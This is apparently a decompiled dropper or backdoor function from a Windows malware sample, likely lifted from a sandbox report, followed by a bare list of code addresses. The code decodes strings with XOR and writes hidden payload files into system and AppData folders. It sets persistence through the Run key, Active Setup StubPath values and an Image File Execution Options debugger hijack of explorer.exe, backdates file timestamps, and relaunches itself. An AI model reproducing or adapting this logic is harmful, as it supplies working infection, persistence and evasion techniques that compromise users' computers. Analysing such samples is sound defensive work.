																		if(_t548 != 0) {
																			goto L205;
																		}
																		_t550 = E00401000(0x8000);
																		_t870[0x1d] = 0x4000;
																		_t853 = _t550;
																		_t551 = 0x407080;
																		_t870[0x27] = 0x4000;
																		while(1) {
																			__eflags = _t551 - 0x4070a4;
																			if(_t551 >= 0x4070a4) {
																				break;
																			}
																			 *_t551 =  *_t551 ^ 0x000000d4;
																			_t551 =  &(_t551[1]);
																		}
																		_t870[0xd] = 0;
																		while(1) {
																			_t258 =  &(_t853[0x4000]); // 0x4000
																			_t771 = _t258;
																			_t555 = RegEnumValueA(_t870[0x2d], _t870[0x13], _t853,  &(_t870[0x2b]), 0,  &(_t870[0x1e]), _t258,  &(_t870[0x1d]));
																			__eflags = _t555;
																			if(_t555 != 0) {
																				break;
																			}
																			__eflags = _t870[0x1c] - 1;
																			if(_t870[0x1c] == 1) {
																				_t557 = E00401311(_t771, 0x40708d);
																				__eflags = _t557;
																				if(_t557 != 0) {
																					RegDeleteValueA(_t870[0x27], _t853);
																				}
																			}
																			_t253 =  &(_t870[0xd]);
																			 *_t253 = _t870[0xd] + 1;
																			__eflags =  *_t253;
																			_t870[0x1d] = 0x4000;
																			_t870[0x27] = 0x4000;
																		}
																		_t772 =  &(_t870[0x55a]);
																		_t560 = wsprintfA(_t853, 0x407080, _t772) + 1;
																		__eflags = _t560;
																		_t870 =  &(_t870[3]);
																		RegSetValueExA(_t870[0x2b], _t772, 0, 1, _t853, _t560);
																		E00401029(_t853);
																		RegCloseKey(_t870[0x26]);
																		goto L205;
																	}
																	_t578 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20006,  &(_t870[0x26]));
																	__eflags = _t578;
																	if(_t578 != 0) {
																		goto L165;
																	}
																	goto L162;
																}
																__eflags = _t423 - 0xffffffff;
																if(_t423 == 0xffffffff) {
																	goto L154;
																}
																L153:
																WriteFile(_t806, 0x408840, 0x5e00,  &(_t870[0x28]), 0); // executed
																CloseHandle(_t870[0x28]); // executed
																goto L155;
															}
															__eflags = _t420 - 0xffffffff;
															if(_t420 != 0xffffffff) {
																goto L153;
															}
															goto L151;
														}
														__eflags = _t586 + 1;
														if(_t586 + 1 != 0) {
															L134:
															WriteFile(_t870[0x2c], 0x40e640, 0x1400,  &(_t870[0x28]), 0); // executed
															__eflags = _t870[3];
															if(_t870[3] != 0) {
																SetFileTime(_t870[0x2b],  &(_t870[0x21]),  &(_t870[0x22]),  &(_t870[0x23])); // executed
															}
															CloseHandle(_t870[0x28]); // executed
															_t870[9] = 1;
															_push(0);
															_push("winlogon.exe");
															_t775 =  &(_t870[0x388]);
															_t592 = E0040318D(_t775);
															_t870 =  &(_t870[3]);
															__eflags = _t592;
															if(_t592 == 0) {
																_push(0);
																_push("explorer.exe");
																E0040318D(_t775);
																_t870 =  &(_t870[3]);
															}
															_push(0);
															_push("kernel32.dll");
															_push(_t775);
															L148:
															E0040318D();
															_t870 =  &(_t870[3]);
															CreateFileA( &(_t870[0x38c]), 0x80000000, 1, 0, 3, 0, 0); // executed
															goto L149;
														}
														goto L146;
													}
													__eflags = _t412 + 1;
													if(_t412 + 1 != 0) {
														goto L134;
													}
													goto L143;
												}
												L140:
												_t870[9] = 1;
												_push(0);
												_push("kernel32.dll");
												_push( &(_t870[0x388]));
												goto L148;
											}
											__eflags = _t408 + 1;
											if(_t408 + 1 == 0) {
												goto L139;
											}
											goto L134;
										} else {
											_t854 =  &(_t870[0x16a]);
											_t600 = GetTempFileNameA(_t756, "tmp", 0, _t854);
											__eflags = _t600;
											if(_t600 == 0) {
												goto L132;
											}
											_t601 = CreateFileA(_t854, 0x40000000, 0, 0, 2, 0x80, 0);
											_t870[0x28] = _t601;
											__eflags = _t601;
											if(_t601 == 0) {
												goto L132;
											}
											__eflags = _t601 + 1;
											if(_t601 + 1 == 0) {
												goto L132;
											}
											L129:
											WriteFile(_t870[0x2c], _t870[8], _t867,  &(_t870[0x28]), 0); // executed
											CloseHandle(_t870[0x28]);
											CreateFileA( &(_t870[0x170]), 0x80000000, 1, 0, 3, 0, 0); // executed
											_t855 =  &(_t870[0x1ee]);
											_t830 =  &(_t870[0x162]);
											_t799 =  &(_t870[0x278]);
											while(1) {
												__eflags = _t855 - _t799;
												if(_t855 >= _t799) {
													goto L132;
												}
												_t609 = _t870[0x1ee] & 0x000000ff ^  *_t830;
												_t830 =  &(_t830[0]);
												 *_t855 = _t609;
												_t855 =  &(_t855[1]);
											}
											goto L132;
										}
									}
									_t856 =  &(_t870[0x16a]);
									_push(_t856);
									_push(0);
									_push(0x411040);
									_push(_t755);
									L00405E90();
									__eflags = _t402;
									if(_t402 == 0) {
										goto L124;
									}
									_push(0);
									_push(0x80);
									_push(2);
									_push(0);
									_push(0);
									_push(0x40000000);
									_push(_t856);
									L00405DB0();
									_t870[0x28] = _t402;
									__eflags = _t402;
									if(_t402 == 0) {
										goto L124;
									}
									__eflags = _t402 + 1;
									if(_t402 + 1 != 0) {
										goto L129;
									}
									goto L124;
								}
								RegDeleteValueA(_t395, "SubshellState");
								RegCloseKey(_t870[0x26]);
								_t857 =  &(_t870[0x1ee]);
								_t831 =  &(_t870[0x162]);
								_t800 =  &(_t870[0x278]);
								while(1) {
									__eflags = _t857 - _t800;
									if(_t857 >= _t800) {
										break;
									}
									_t636 = _t870[0x1ee] & 0x000000ff ^  *_t857;
									_t857 =  &(_t857[0]);
									 *_t831 = _t636;
									_t831 =  &(_t831[1]);
								}
								_push( *0x4120b0);
								_t615 =  &(_t870[0x163]);
								_push(_t615);
								L00405E50();
								__eflags = _t615;
								if(_t615 != 0) {
									L99:
									_t776 =  &(_t870[0x16b]);
									SetFileAttributesA(_t776, 0x80);
									DeleteFileA(_t776);
									goto L113;
								}
								_push( &(_t870[0x55a]));
								_t619 =  &(_t870[0x1ac]);
								_push(_t619);
								L00405E50();
								__eflags = _t619;
								if(_t619 == 0) {
									_t621 = CreateFileA( &(_t870[0x170]), 0x80000000, 1, 0, 3, 0, 0);
									_t870[0x28] = _t621;
									__eflags = _t621;
									if(_t621 == 0) {
										goto L99;
									}
									__eflags = _t621 - 0xffffffff;
									if(_t621 == 0xffffffff) {
										goto L99;
									}
									_t622 = GetFileSize(_t621, 0);
									_t870[0x1d] = _t622;
									__eflags = _t622 - _t867;
									if(_t622 == _t867) {
										_t625 = E00401000(_t867);
										_t858 = _t625;
										ReadFile(_t870[0x2c], _t625, _t867,  &(_t870[0x28]), 0);
										_t777 = _t870[0x1d];
										_t832 = _t858;
										_t843 = _t870[5];
										__eflags = _t858 - _t858 + _t777;
										while(__eflags < 0) {
											_t801 =  *_t832 & 0x000000ff;
											__eflags = _t870[0x162] - ( *_t843 & 0x000000ff);
											if(__eflags == 0) {
												__eflags = _t801;
											}
											if(__eflags == 0) {
												_t832 =  &(_t832[1]);
												_t843 =  &(_t843[1]);
												__eflags = _t832 - _t858 + _t777;
												continue;
											} else {
												E00401029(_t858);
												goto L103;
											}
										}
										E00401029(_t858);
										goto L132;
									}
									L103:
									CloseHandle(_t870[0x28]);
								}
								goto L99;
							}
							_t778 =  &(_t870[0x3cb]);
							_t637 = GetSystemDirectoryA(_t778, 0x104);
							_push( *0x412090);
							_push(0x41103e);
							_push(_t778);
							L00405E30();
							_push(_t637);
							L00405E30();
							_t638 = "{0C8E6D89-EA51-848A-7775-6C2CC072CA88}";
							while(1) {
								__eflags = _t638 - 0x407286;
								if(_t638 >= 0x407286) {
									break;
								}
								 *_t638 =  *_t638 ^ 0x000000d4;
								_t638 =  &(_t638[1]);
							}
							_t639 = CreateMutexA(0, 0, "{0C8E6D89-EA51-848A-7775-6C2CC072CA88}"); // executed
							_t870[0x28] = _t639;
							__eflags = _t639;
							if(_t639 == 0) {
								Sleep(0x7d0);
							} else {
								WaitForSingleObject(_t639, 0x2710);
								CloseHandle(_t870[0x28]);
							}
							_t779 =  &(_t870[0x3cb]);
							SetFileAttributesA(_t779, 0x80); // executed
							_t641 = CreateFileA(_t779, 0x40000000, 0, 0, 2, 0x80, 0); // executed
							_t870[0x28] = _t641;
							__eflags = _t641;
							if(_t641 == 0) {
								L92:
								RegCloseKey(_t870[0x26]); // executed
								RegDeleteKeyA(0x80000001,  &(_t870[0x40e])); // executed
								goto L93;
							} else {
								__eflags = _t641 - 0xffffffff;
								if(_t641 == 0xffffffff) {
									goto L92;
								}
								WriteFile(_t641, 0x4072a0, 0x800,  &(_t870[0x28]), 0); // executed
								_t646 = E004010B2();
								_t870[6] = _t646;
								__eflags = _t646;
								if(_t646 == 0) {
									_t870[6] = 0xc6;
								}
								_t648 = E00401000(_t867 + 0x64);
								 *((char*)(_t648 + _t867)) = 0;
								_t844 = _t648;
								_t859 = _t648;
								_t834 = _t870[5];
								_t649 = _t648 + _t867;
								while(1) {
									__eflags = _t859 - _t649;
									if(_t859 >= _t649) {
										break;
									}
									_t674 = _t870[6] & 0x000000ff ^  *_t834;
									_t834 =  &(_t834[0]);
									 *_t859 = _t674;
									_t859 = _t859 + 1;
									_t649 = _t844 + _t867;
								}
								_t650 =  &(_t870[0x55a]);
								_t780 = _t844 + _t867;
								_push(_t650);
								L00405E40();
								_t860 = _t780 +  &(_t650[1]);
								__eflags = _t860 - _t780 + 0x64;
								while(__eflags < 0) {
									 *_t860 = E004010B2();
									_t860 = _t860 + 1;
									_t127 = _t867 + 0x64; // 0x64
									__eflags = _t860 - _t844 + _t127;
								}
								 *(_t844 + _t867 + 1) = _t867;
								_t782 = _t844 + _t867;
								_push( &(_t870[0x55a]));
								_t861 = _t782;
								_push( &(_t782[1]));
								L00405E20();
								_t653 =  &(_t782[0x19]);
								while(1) {
									__eflags = _t861 - _t653;
									if(_t861 >= _t653) {
										break;
									}
									 *_t861 =  *_t861 ^ _t870[6] & 0x000000ff;
									_t861 =  &(_t861[0]);
									_t136 = _t867 + 0x64; // 0x64
									_t653 = _t844 + _t136;
								}
								WriteFile(_t870[0x2c], _t844, _t867 + 0x64,  &(_t870[0x28]), 0); // executed
								E00401029(_t844);
								__eflags = _t870[3];
								if(_t870[3] != 0) {
									SetFileTime(_t870[0x2b],  &(_t870[0x21]),  &(_t870[0x22]),  &(_t870[0x23])); // executed
								}
								CloseHandle(_t870[0x28]); // executed
								_t783 =  &(_t870[0x3d0]);
								CreateFileA(_t783, 0x80000000, 1, 0, 3, 0, "true"); // executed
								E00401251(_t870[0x26]);
								_t870[0x27] = 1;
								_t663 = RegSetValueExA(_t870[0x2b], "IsInstalled", 0, 4,  &(_t870[0x28]), 4); // executed
								_push(_t783);
								L00405E40();
								_t664 = _t663 + 1;
								__eflags = _t664;
								RegSetValueExA(_t870[0x2b], "StubPath", 0, 1, _t783, _t664); // executed
								_t870[0xa] = 1;
								goto L92;
							}
						}
						__eflags =  *((char*)(_t869 + 0x1e8));
						if( *((char*)(_t869 + 0x1e8)) != 0) {
							_push(_t753);
							_t677 = _t869 + 0x1bc;
							_push(_t677);
							L00405E20();
							while(1) {
								_t784 = _t869 + 0x1b8;
								_push(_t784);
								L00405E40();
								__eflags = _t677 - 0xf;
								if(_t677 > 0xf) {
									goto L62;
								}
								_t677 = _t869 + 0x1e8;
								_push(_t677);
								_push(_t784);
								L00405E30();
							}
							goto L62;
						}
						goto L58;
					}
					_t679 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe", _t869 + 0x98); // executed
					__eflags = _t679;
					if(_t679 != 0) {
						goto L56;
					}
					_t785 = _t869 + 0x123c;
					_t680 = GetSystemDirectoryA(_t785, 0x104);
					_push( *0x4120a0);
					_push(0x41103e);
					_push(_t785);
					L00405E30();
					_push(_t680);
					L00405E30();
					_t681 = "{1A59D3E9-9D17-EB65-EA3F-071C953972C0}";
					while(1) {
						__eflags = _t681 - 0x407b06;
						if(_t681 >= 0x407b06) {
							break;
						}
						 *_t681 =  *_t681 ^ 0x000000d4;
						_t681 =  &(_t681[1]);
					}
					_t682 = CreateMutexA(0, 0, "{1A59D3E9-9D17-EB65-EA3F-071C953972C0}"); // executed
					 *(_t869 + 0xa0) = _t682;
					__eflags = _t682;
					if(_t682 == 0) {
						Sleep(0x7d0);
					} else {
						WaitForSingleObject(_t682, 0x2710);
						CloseHandle( *(_t869 + 0xa0)); // executed
					}
					_t786 = _t869 + 0x123c;
					SetFileAttributesA(_t786, 0x80); // executed
					_t684 = CreateFileA(_t786, 0x40000000, 0, 0, 2, 0x80, 0); // executed
					 *(_t869 + 0xa0) = _t684;
					__eflags = _t684;
					if(_t684 == 0) {
						L55:
						RegCloseKey( *(_t869 + 0x98)); // executed
						goto L56;
					} else {
						__eflags = _t684 - 0xffffffff;
						if(_t684 == 0xffffffff) {
							goto L55;
						}
						WriteFile(_t684, 0x407b20, 0xc00, _t869 + 0xa0, 0); // executed
						_t687 = E004010B2();
						 *(_t869 + 0x1b) = _t687;
						__eflags = _t687;
						if(_t687 == 0) {
							 *(_t869 + 0x1b) = 0x66;
						}
						_t689 = E00401000(_t867 + 0x64);
						 *((char*)(_t689 + _t867)) = 0;
						_t845 = _t689;
						_t862 = _t689;
						_t837 =  *(_t869 + 0x14);
						_t690 = _t689 + _t867;
						while(1) {
							__eflags = _t862 - _t690;
							if(_t862 >= _t690) {
								break;
							}
							_t714 =  *(_t869 + 0x1b) & 0x000000ff ^  *_t837;
							_t837 =  &(_t837[0]);
							 *_t862 = _t714;
							_t862 = _t862 + 1;
							_t690 = _t845 + _t867;
						}
						_t691 = _t869 + 0x1568;
						_t787 = _t845 + _t867;
						_push(_t691);
						L00405E40();
						_t863 = _t787 + _t691 + 5;
						__eflags = _t863 - _t787 + 0x64;
						while(__eflags < 0) {
							 *_t863 = E004010B2();
							_t863 = _t863 + 1;
							_t55 = _t867 + 0x64; // 0x64
							__eflags = _t863 - _t845 + _t55;
						}
						 *(_t845 + _t867 + 1) = _t867;
						_t789 = _t845 + _t867;
						_push(_t869 + 0x1568);
						_t864 = _t789;
						_push( &(_t789[1]));
						L00405E20();
						_t694 =  &(_t789[0x19]);
						while(1) {
							__eflags = _t864 - _t694;
							if(_t864 >= _t694) {
								break;
							}
							 *_t864 =  *_t864 ^  *(_t869 + 0x1b) & 0x000000ff;
							_t864 =  &(_t864[0]);
							_t64 = _t867 + 0x64; // 0x64
							_t694 = _t845 + _t64;
						}
						WriteFile( *(_t869 + 0xb0), _t845, _t867 + 0x64, _t869 + 0xa0, 0); // executed
						E00401029(_t845);
						__eflags =  *(_t869 + 0xc);
						if( *(_t869 + 0xc) != 0) {
							SetFileTime( *(_t869 + 0xac), _t869 + 0x84, _t869 + 0x88, _t869 + 0x8c); // executed
						}
						CloseHandle( *(_t869 + 0xa0));
						_t790 = _t869 + 0x1250;
						CreateFileA(_t790, 0x80000000, 1, 0, 3, 0, 0); // executed
						RegDeleteValueA( *(_t869 + 0x9c), "Debugger"); // executed
						_t703 = E00401251( *(_t869 + 0x98));
						_push(_t790);
						L00405E40();
						_t704 = _t703 + 1;
						__eflags = _t704;
						RegSetValueExA( *(_t869 + 0xac), "Debugger", 0, 1, _t790, _t704); // executed
						 *(_t869 + 0x2c) = 1;
						goto L55;
					}
				}
				_t791 = _t869 + 0x145c;
				_t722 = GetSystemDirectoryA(_t791, 0x100);
				_push( *0x4120b0);
				_push(0x41103e);
				_push(_t791);
				L00405E30();
				L00405E30();
				_t865 = _t869 + 0x1568;
				_t724 = E004010F7(_t869 + 0x1568, _t791, _t722);
				if(_t724 != 0) {
					L8:
					if( *(_t869 + 0x20) != 0) {
						_t737 = CreateFileA(_t869 + 0x1470, 0x40000000, 0, 0, 3, 0, 0);
						_t794 = _t737;
						if(_t737 != 0 && _t737 != 0xffffffff) {
							SetFilePointer(_t737, 0xfffffff0, 0, 2);
							WriteFile(_t794, 0x4120e0, 4, _t869 + 0xa0, 0);
							CloseHandle(_t794);
						}
					}
					if( *(_t869 + 0xc) != 0) {
						_t730 = CreateFileA(_t869 + 0x1470, 0x80000100, 1, 0, 3, 0, 0);
						_t793 = _t730;
						if(_t730 != 0 && _t730 != 0xffffffff) {
							SetFileTime(_t793, _t869 + 0x84, _t869 + 0x88, _t869 + 0x8c);
							CloseHandle(_t793);
						}
					}
					_t866 = _t869 + 0x145c;
					SetFileAttributesA(_t866, 0x21);
					CloseHandle( *(_t869 + 0x10));
					_t792 = _t869 + 0xb28;
					GetStartupInfoA(_t792);
					_push(_t869 + 0xb18);
					_push(_t792);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(_t866);
					CreateProcessA();
					ExitProcess(0);
					L19:
					 *0x412000 = 1;
					goto L20;
				}
				_push(0x104);
				_push(_t791);
				_push( *0x4120b0);
				_push("%CommonProgramFiles%\\System\\");
				_t846 = _t869 + 0x1358;
				L00405E20();
				L00405E30();
				_t742 = ExpandEnvironmentStringsA(_t724, _t724, _t846);
				if(_t742 == 0) {
					L6:
					_push(0x104);
					_push(_t791);
					_push( *0x4120b0);
					_push("%AppData%\\");
					L00405E20();
					L00405E30();
					if(ExpandEnvironmentStringsA(_t742, _t742, _t846) == 0 || E004010F7(_t865, _t791) == 0) {
						goto L19;
					} else {
						goto L8;
					}
				}
				_t742 = E004010F7(_t865, _t791);
				if(_t742 != 0) {
					goto L8;
				}
				goto L6;
			}

0x004042b2
0x004042b7
0x004042c1
0x004042c3
0x004042de
0x004042ea
0x004042ef
0x004042ef
0x004042fc
0x004044af
0x004044c6
0x004044cb
0x004044d4
0x00404517
0x0040451f
0x0040451f
0x004044db
0x004044e3
0x004044ea
0x00404504
0x00404510
0x00404510
0x0040453f
0x00404545
0x0040454a
0x0040454f
0x00404556
0x00404559
0x00404559
0x00404561
0x00404561
0x00404566
0x00000000
0x00000000
0x00404568
0x00404568
0x00404569
0x00404569
0x0040456e
0x00404575
0x004047c9
0x004047c9
0x004047d6
0x004047de
0x004047e3
0x004047e5
0x004047f1
0x004047f1
0x004047fd
0x004047fe
0x00404835
0x004048cf
0x004048d4
0x004048d7
0x004048dc
0x004048dc
0x004048e1
0x00000000
0x00000000
0x004048e3
0x004048e6
0x004048e6
0x004048ee
0x004048ee
0x004048f3
0x00000000
0x00000000
0x004048f5
0x004048f5
0x004048f6
0x004048f6
0x004048fb
0x00404900
0x00404905
0x0040490c
0x0040490d
0x00404912
0x00404913
0x00404926
0x0040492b
0x0040492d
0x00404b8d
0x00404b94
0x00404b99
0x00404ba0
0x00404ba2
0x00404ce5
0x00404ce5
0x00404cea
0x00404cec
0x00404cee
0x00404cf0
0x00404cf0
0x00404cf2
0x00404cf9
0x00404cfe
0x00404d00
0x00404d02
0x00404d04
0x00404d04
0x00404d06
0x00404d0d
0x00404d1a
0x00404d1b
0x00404d27
0x00404d2f
0x00404d30
0x00404d35
0x00404d39
0x00404d3c
0x00404d3c
0x00404d3e
0x00000000
0x00000000
0x00404d48
0x00404d4a
0x00404d4f
0x00404d4f
0x00404d58
0x00404d65
0x00404d6a
0x00404d6c
0x00404dad
0x00404dad
0x00404dba
0x00404dbf
0x00404dc1
0x00404e76
0x00404e7a
0x00404e84
0x00404e8c
0x00404e91
0x00404e96
0x00404e9c
0x00404ea1
0x00404ea2
0x00404ea8
0x00404eae
0x00404ec6
0x00404ecb
0x00404ed2
0x00404ed4
0x00404f78
0x00404f78
0x00404f7d
0x00404f80
0x00404fa3
0x00404fb0
0x00404fb5
0x00404fba
0x00404fc1
0x00404fc7
0x00404fdf
0x00404fe4
0x00404feb
0x00404fed
0x00404ff6
0x00404ff6
0x00404ffb
0x00404ffe
0x00000000
0x00000000
0x00405006
0x0040500b
0x00405010
0x00405017
0x0040501d
0x00405035
0x0040503a
0x00405041
0x00405043
0x0040504c
0x0040504c
0x00405051
0x00405054
0x00000000
0x00000000
0x00405080
0x00405085
0x00405092
0x00405097
0x0040509c
0x004050a3
0x004050a9
0x004050c1
0x004050c6
0x004050cd
0x004050cf
0x004050d1
0x004050d8
0x004050d8
0x004050e5
0x004050ea
0x004050ef
0x004050f6
0x004050fc
0x00405114
0x00405119
0x00405120
0x00405122
0x00405124
0x00405153
0x00405153
0x0040515b
0x0040515b
0x00405163
0x0040517c
0x0040517c
0x00405186
0x0040518e
0x00405193
0x00405198
0x00405199
0x004051a0
0x004051b0
0x004051b7
0x004051c7
0x004051ce
0x004051d3
0x004051d8
0x004051d8
0x004051dd
0x00000000
0x00000000
0x004051df
0x004051e2
0x004051e2
0x004051fe
0x00405203
0x00405205
0x00405229
0x00405229
0x0040522e
0x00405237
0x0040523e
0x00405243
0x00405244
0x00405249
0x00405249
0x0040525d
0x0040525d
0x0040526e
0x0040527a
0x0040527f
0x0040527f
0x00405286
0x004054f1
0x00405509
0x0040550f
0x00405514
0x00405519
0x00405519
0x0040551e
0x00000000
0x00000000
0x00405520
0x00405523
0x00405523
0x00405526
0x0040552e
0x00405538
0x0040553d
0x00405542
0x00000000
0x00000000
0x00405548
0x00405550
0x00405558
0x0040555d
0x0040555f
0x004057d5
0x004057d5
0x004057f2
0x004057f2
0x004057fa
0x004057fa
0x00405802
0x00405804
0x00405806
0x0040580b
0x00405810
0x00405815
0x0040581a
0x0040581f
0x0040582c
0x00405831
0x00405831
0x00405834
0x00405839
0x00405841
0x00405849
0x00405863
0x00405868
0x0040586a
0x00405873
0x00405878
0x0040589d
0x004058a2
0x004058a3
0x004058a8
0x004058a8
0x004058bb
0x004058c7
0x004058c7
0x0040586a
0x004058cc
0x004058d1
0x004058d8
0x00405933
0x00405938
0x0040593a
0x00405957
0x00405957
0x0040595e
0x0040595f
0x00405964
0x00405964
0x00405965
0x00405966
0x00405967
0x00405969
0x0040596b
0x00000000
0x0040596b
0x0040594e
0x00405953
0x00405955
0x00000000
0x00000000
0x00000000
0x004058da
0x004058dc
0x004058e4
0x004058f4
0x004058f9
0x004058fb
0x00405989
0x00405989
0x0040598e
0x00000000
0x00000000
0x00405996
0x004059b8
0x004059bd
0x004059bf
0x004059e7
0x00405a04
0x00405a10
0x00405a15
0x00405a17
0x00405a1f
0x00405a24
0x00405a2b
0x00405a32
0x00405a9f
0x00405aa4
0x00405aa6
0x00000000
0x00000000
0x00405aa8
0x00405aa9
0x00405abe
0x00405ada
0x00405ae6
0x00405af6
0x00405afb
0x00405afd
0x00000000
0x00000000
0x00405aff
0x00405b06
0x00000000
0x00405b06
0x00405a3f
0x00405a44
0x00405a46
0x00000000
0x00000000
0x00405a53
0x00405a58
0x00405a59
0x00405a71
0x00405a8d
0x00000000
0x00405a8d
0x004059de
0x004059e3
0x004059e5
0x00000000
0x00000000
0x00000000
0x004059e5
0x00405908
0x0040590d
0x0040590e
0x00405914
0x00405915
0x00405916
0x00405918
0x0040591a
0x00405971
0x00405978
0x00405984
0x00000000
0x00405984
0x00405b0b
0x00405b15
0x00405b1f
0x00405b24
0x00405b24
0x00405b24
0x00405b24
0x00405b4c
0x00405b51
0x00405b53
0x00405b59
0x00405b66
0x00405b78
0x00405b7d
0x00405b7f
0x00405b85
0x00405b86
0x00405b88
0x00405b8c
0x00405bae
0x00405bb8
0x00405bbd
0x00405bc4
0x00405be5
0x00405bc6
0x00405bd1
0x00405bd9
0x00405bd9
0x00405b8e
0x00405b9e
0x00405b9e
0x00405b8c
0x00405bee
0x00405bee
0x00000000
0x00405b53
0x00405583
0x00405588
0x0040558a
0x004057de
0x004057e2
0x00000000
0x00000000
0x004057e4
0x004057e4
0x00000000
0x004057e4
0x00405590
0x00405595
0x0040559a
0x004055a7
0x004055bf
0x004055c4
0x004055c6
0x004055dc
0x004055e8
0x004055ed
0x00405669
0x00405669
0x00405670
0x004056a9
0x004056a9
0x004056cf
0x004056d1
0x004056e7
0x004056e7
0x004056ec
0x004056ee
0x004057cc
0x004057d0
0x00000000
0x004057d0
0x004056f4
0x004056fd
0x004056ff
0x00405705
0x00405708
0x0040572b
0x0040572b
0x00405738
0x00405750
0x00405755
0x00405757
0x00405761
0x00405761
0x00405766
0x00405769
0x0040576d
0x0040576d
0x0040577c
0x00405781
0x00000000
0x00405783
0x00405783
0x00405788
0x0040578a
0x00000000
0x00000000
0x0040578c
0x00405795
0x00405797
0x0040579d
0x004057a0
0x00000000
0x00000000
0x004057a2
0x004057a4
0x004057a5
0x004057a7
0x004057a9
0x004057ae
0x004057b5
0x004057be
0x004057c3
0x00000000
0x004057c3
0x00405781
0x00405712
0x00405716
0x0040571a
0x0040571c
0x0040571d
0x0040571f
0x00405721
0x00000000
0x00405721
0x004056e0
0x004056e5
0x00000000
0x00000000
0x00000000
0x004056e5
0x00405672
0x0040567b
0x0040567d
0x00405683
0x00405686
0x00000000
0x00000000
0x00405690
0x00405694
0x00405698
0x0040569a
0x0040569b
0x0040569d
0x0040569f
0x00000000
0x0040569f
0x004055ef
0x004055f4
0x004055f6
0x00000000
0x00000000
0x00405605
0x0040560b
0x0040560d
0x0040560f
0x00405611
0x00405619
0x0040561f
0x00405622
0x00405624
0x00405624
0x00405622
0x0040562a
0x0040562f
0x00405631
0x0040565f
0x00405633
0x0040563b
0x00405640
0x00405642
0x00405647
0x0040564d
0x0040564f
0x00405654
0x00405656
0x00405656
0x00405654
0x00405658
0x00405658
0x00000000
0x00405631
0x004055cc
0x004055d1
0x004055d6
0x00000000
0x00000000
0x00000000
0x004057ee
0x004057ee
0x004057ee
0x004057ee
0x00000000
0x004057ee
0x0040552e
0x0040528c
0x00405291
0x00405291
0x00405296
0x00000000
0x00000000
0x00405298
0x0040529b
0x0040529b
0x0040529e
0x004052a3
0x004052a3
0x004052a8
0x00000000
0x00000000
0x004052aa
0x004052ad
0x004052ad
0x004052b0
0x004052c2
0x004052c7
0x004052c9
0x004052e5
0x004052f1
0x004052f1
0x004052f6
0x004052fb
0x004052fb
0x00405300
0x00000000
0x00000000
0x00405302
0x00405305
0x00405305
0x00405308
0x0040530d
0x0040530d
0x00405312
0x00000000
0x00000000
0x00405314
0x00405317
0x00405317
0x0040531a
0x0040531f
0x0040531f
0x00405324
0x00000000
0x00000000
0x00405326
0x00405329
0x00405329
0x0040532c
0x00405331
0x00405331
0x00405336
0x00000000
0x00000000
0x00405338
0x0040533b
0x0040533b
0x0040533e
0x00405343
0x00405343
0x00405348
0x00000000
0x00000000
0x0040534a
0x0040534d
0x0040534d
0x00405362
0x00405367
0x00405369
0x0040536d
0x00405385
0x0040539d
0x004053b5
0x004053cd
0x004053d9
0x004053d9
0x004053de
0x004053e3
0x004053e3
0x004053e8
0x00000000
0x00000000
0x004053ea
0x004053ed
0x004053ed
0x00405402
0x00405407
0x00405409
0x00000000
0x00000000
0x00405413
0x00405418
0x00405420
0x00405422
0x00405427
0x00405432
0x00405432
0x00405437
0x00000000
0x00000000
0x00405439
0x0040543c
0x0040543c
0x0040543f
0x00405484
0x00405488
0x00405488
0x004054ab
0x004054b0
0x004054b2
0x00000000
0x00000000
0x00405449
0x0040544e
0x00405457
0x0040545c
0x0040545e
0x00405468
0x00405468
0x0040545e
0x0040546d
0x0040546d
0x0040546d
0x00405471
0x00405479
0x00405479
0x004054b4
0x004054c7
0x004054c7
0x004054c8
0x004054d9
0x004054e0
0x004054ec
0x00000000
0x004054ec
0x00405220
0x00405225
0x00405227
0x00000000
0x00000000
0x00000000
0x00405227
0x00405126
0x00405129
0x00000000
0x00000000
0x0040512b
0x00405140
0x0040514c
0x00000000
0x0040514c
0x004050d3
0x004050d6
0x00000000
0x00000000
0x00000000
0x004050d6
0x00405045
0x00405046
0x00404ee1
0x00404efc
0x00404f01
0x00404f06
0x00404f27
0x00404f27
0x00404f33
0x00404f38
0x00404f40
0x00404f42
0x00404f47
0x00404f4f
0x00404f54
0x00404f57
0x00404f59
0x00404f5b
0x00404f5d
0x00404f63
0x00404f68
0x00404f68
0x00404f6b
0x00404f6d
0x00404f72
0x0040505c
0x0040505c
0x00405061
0x0040507b
0x00000000
0x0040507b
0x00000000
0x00405046
0x00404fef
0x00404ff0
0x00000000
0x00000000
0x00000000
0x00404ff0
0x00404f82
0x00404f82
0x00404f8a
0x00404f8c
0x00404f98
0x00000000
0x00404f98
0x00404eda
0x00404edb
0x00000000
0x00000000
0x00000000
0x00404dc7
0x00404dc7
0x00404dd7
0x00404ddc
0x00404dde
0x00000000
0x00000000
0x00404df7
0x00404dfc
0x00404e03
0x00404e05
0x00000000
0x00000000
0x00404e07
0x00404e08
0x00000000
0x00000000
0x00404e0a
0x00404e20
0x00404e2c
0x00404e48
0x00404e4d
0x00404e54
0x00404e5b
0x00404e62
0x00404e62
0x00404e64
0x00000000
0x00000000
0x00404e6e
0x00404e70
0x00404e71
0x00404e73
0x00404e73
0x00000000
0x00404e62
0x00404dc1
0x00404d6e
0x00404d75
0x00404d76
0x00404d78
0x00404d7d
0x00404d7e
0x00404d83
0x00404d85
0x00000000
0x00000000
0x00404d87
0x00404d89
0x00404d8e
0x00404d90
0x00404d92
0x00404d94
0x00404d99
0x00404d9a
0x00404d9f
0x00404da6
0x00404da8
0x00000000
0x00000000
0x00404daa
0x00404dab
0x00000000
0x00000000
0x00000000
0x00404dab
0x00404bae
0x00404bba
0x00404bbf
0x00404bc6
0x00404bcd
0x00404bd4
0x00404bd4
0x00404bd6
0x00000000
0x00000000
0x00404be0
0x00404be2
0x00404be3
0x00404be5
0x00404be5
0x00404be8
0x00404bee
0x00404bf5
0x00404bf6
0x00404bfb
0x00404bfd
0x00404c18
0x00404c1d
0x00404c25
0x00404c2b
0x00000000
0x00404c2b
0x00404c06
0x00404c07
0x00404c0e
0x00404c0f
0x00404c14
0x00404c16
0x00404c4c
0x00404c51
0x00404c58
0x00404c5a
0x00000000
0x00000000
0x00404c5c
0x00404c5f
0x00000000
0x00000000
0x00404c64
0x00404c69
0x00404c6d
0x00404c6f
0x00404c8c
